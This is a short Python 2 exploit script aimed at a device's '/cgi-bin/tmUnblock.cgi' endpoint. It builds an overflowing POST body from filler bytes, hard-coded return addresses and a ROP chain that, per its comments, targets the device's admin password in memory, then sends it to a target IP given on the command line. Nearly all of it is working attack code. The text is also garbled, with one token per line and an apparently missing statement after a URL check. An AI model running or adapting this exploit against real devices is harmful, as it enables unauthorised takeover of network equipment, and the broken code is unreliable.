import
sys
import
urllib2
try
:
target
=
sys.argv[
1
]
except
IndexError:
print
"Usage: %s <target ip>"
%
sys.argv[
0
]
sys.exit(
1
)
url
=
target
+
'/cgi-bin/tmUnblock.cgi'
if
'://'
not
in
url:
post_data
=
"period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
post_data
+
=
"B"
*
246
# Filler
post_data
+
=
"\x81\x54\x4A\xF0"
# $s0, address of admin password in memory
post_data
+
=
"\x80\x31\xF6\x34"
# $ra
post_data
+
=
"C"
*
0x28
# Stack filler
post_data
+
=
"D"
*
4
# ROP 1 $s0, don't care
post_data
+
=
"\x80\x34\x71\xB8"
# ROP 1 $ra (address of ROP 2)
post_data
+
=
"E"
*
8
# Stack filler
for
i
in
range
(
0
,
4
):
post_data
+
=
"F"
*
4
# ROP 2 $s0, don't care
post_data
+
=
"G"
*
4
# ROP 2 $s1, don't care
post_data
+
=
"\x80\x34\x71\xB8"
# ROP 2 $ra (address of itself)
post_data
+
=
"H"
*
(
4
-
(
3
*
(i
/
3
)))
# Stack filler; needs to be 4 bytes except for the
# last stack frame where it needs to be 1 byte (to
# account for the trailing "\n\n" and terminating
# NULL byte)
try
:
req
=
urllib2.Request(url, post_data)
res
=
urllib2.urlopen(req)
except
urllib2.HTTPError as e:
if
e.code
=
=
500
:
print
"OK"
else
:
print
"Received unexpected server response:"
,
str
(e)
except
KeyboardInterrupt:
pass